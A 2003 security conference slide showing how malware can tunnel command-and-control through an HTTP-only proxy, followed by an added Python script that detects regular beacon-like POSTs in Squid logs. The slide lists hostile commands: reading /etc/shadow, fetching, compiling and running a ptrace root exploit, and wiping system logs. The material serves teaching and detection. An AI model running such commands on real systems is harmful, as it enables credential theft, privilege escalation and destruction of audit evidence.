
All locked down.
Now that only true HTTP is allowed, we're safe, right?
$ nc proxy 3128
POST http://home.my_server.net/cgi-bin/runcommands.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; ...)
Host: home.my_server.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 83

uname=Linux+testy+2.4.10-bf2.4+%231+Son+Apr+14+09%3a53%3acpu=686&cpuspeed=731&memfree=103727

shadow now cat /etc/shadow
ptracebug now cd /tmp; wget ...ptracebug.c; make ptracebug; ./ptracebug && echo r00ted
clearlogs 10m /tmp/.../newsudo cat /dev/null > /var/log/messages
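
The request above is well-formed HTTP, so a proxy that only checks protocol conformance passes it; what stays visible to the defender is its pattern in the proxy log. The following is an added example, not part of the original presentation: it flags clients that POST to a single host at a near-constant interval. It assumes Squid native-format access.log lines and a client that polls on a fixed schedule; the log lines, hostnames, addresses and thresholds are constructed for illustration.

```python
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed Squid native-format lines (not from the presentation):
# time elapsed client code/status bytes method URL ident hierarchy/peer type
def make_sample():
    lines = []
    for i in range(6):  # one host POSTing roughly every 600 s, +/- 1 s jitter
        lines.append(f"{1050000000 + i * 600 + (i % 2)}.000 180 10.0.0.5 TCP_MISS/200 310 "
                     "POST http://poll.example.test/cgi-bin/check.cgi - DIRECT/192.0.2.10 text/plain")
    for t in (30, 95, 1900, 2400, 2410, 5000):  # irregular, human-driven form posts
        lines.append(f"{1050000000 + t}.000 420 10.0.0.7 TCP_MISS/200 8120 "
                     "POST http://webmail.example.test/send - DIRECT/192.0.2.20 text/html")
    return lines

SAMPLE_LOG = make_sample()

def parse(line):
    """Return (timestamp, client, method, destination host) or None if malformed."""
    f = line.split()
    if len(f) < 7:
        return None
    return float(f[0]), f[2], f[5], urlsplit(f[6]).hostname

def find_beacons(lines, min_events=5, max_cv=0.1):
    """Flag (client, host) pairs whose POST inter-arrival times barely vary."""
    times = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3]:
            times[(rec[1], rec[3])].append(rec[0])
    hits = []
    for (client, host), ts in times.items():
        if len(ts) < min_events:
            continue  # too few requests to judge regularity
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # simultaneous requests, not a schedule
        # Coefficient of variation: low means machine-like timing.
        if statistics.pstdev(gaps) / mean <= max_cv:
            hits.append((client, host, round(mean), len(ts)))
    return hits

if __name__ == "__main__":
    for client, host, period, n in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {host}: {n} POSTs about every {period}s")
```

Timing regularity is only one signal; a client that randomizes its interval raises the coefficient of variation, so the threshold is a tuning decision and the result is a lead for review rather than a verdict.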
Copyright 2003, Bri Hatch of Onsight, Inc.
Presented at SecureWorld Expo, 2003.
Presentation created using vim and MagicPoint.